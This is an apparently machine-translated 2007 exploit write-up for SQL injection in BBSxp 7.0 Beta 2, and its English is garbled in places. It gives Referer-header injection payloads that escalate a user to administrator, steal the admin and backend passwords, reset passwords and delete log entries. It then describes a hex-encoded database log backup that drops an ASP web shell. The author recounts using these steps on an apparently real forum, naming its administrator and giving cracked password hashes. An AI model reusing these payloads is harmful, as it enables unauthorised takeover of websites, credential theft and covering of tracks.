Then the storm BBSxp 7.0 Beta 2 vulnerability-vulnerability warning-the black bar safety net

2007-02-13T00:00:00
ID MYHACK58:62200714215
Type myhack58
Reporter 佚名
Modified 2007-02-13T00:00:00

Description

The vulnerability exists in the file setup. asp

The first part of the

Registration->login->post->edit->capture->package->promoted to administrator->change background-password - >login backend->WEBSHELL

Here I set the password as: ttfct1 ,NC submitted successfully provided for the administrator. With password: ttfct1 landing in the background. Successfully get WEBSHELL, the successful backup, get WEBSHELL success.

WEBSHELL acquisition of two methods A: background upload increase htr II: log backup, a total of 4 steps

The second part of the

Detection official website I have registered well, the user is sina147 Registration->login->post->edit->capture In order not to attract the Administrators attention, we directly obtain the administrator password and background the password, and then log in the background.

Sorry, just a little problem, power outage. Continue to, the capture, modify, and I checked, yuzi is the administrator.

yuzi password 5D4D89BEA718BEE10686FB053E86F13B->0 8 0 5 3 2 7 7 9 Background login password: 531BC3E862F67DC2BAA871EABDE81A4F->0 8 0 5 3 2 4 4 9

Landing back This document request a physical path D:\www\bbs.yuzi.net\Admin_other.asp with this, it is a chance to get WEBSHELL. Behind the animation is not made, we play it.

OVER


Promoted to administrator: Referer: http://127.0.0.1',",",'modify post success');update bbsxp_users set UserRoleID=1 where username='sina'--

Get the administrator password(i.e. a password: a Referer: http://127.0.0.1',", ",'modify post success');update bbsxp_users set UserMail= (select userpass from bbsxp_users where username='yuzi') where username='sina147'

Get back the password(i.e., the secondary password, of: Referer: http://127.0.0.1',",",'modify post success');update bbsxp_users set UserMail=(select top 1 adminpassword from bbsxp_sitesettings) where username='sina147'

Change the Admin Password(secondary password Referer: http://127.0.0.1',",",'modify post success');update bbsxp_sitesettings set adminpassword=(select userpass from bbsxp_users where username='sina')

Delete log: Referer: http://127.0.0.1',",",'modify post success');delete from bbsxp_log where username='sina147'

LOG backup Backup address: C:\Inetpub\wwwroot\ttfct.asp

The first step create table [dbo]. [shit_tmp] ([cmd] [image])

The second step declare @a sysname,@s nvarchar(4 0 0 0) select @a=db_name(),@s=0x7900690061006F006C007500 backup log @a to disk = @s with init,no_truncate

The third step insert into shit_tmp values(0x3C25657865637574652872657175657374282261222929253e)

The fourth step declare @a sysname,@s nvarchar(4 0 0 0) select @a=db_name(),@s=0x43003A005C0049006E00650074007000750062005c0077007700770072006f006f0074005c00740074006600630074002e00610073007000 backup log @a to disk=@s with init,no_truncate

The fifth step Drop table [shit_tmp]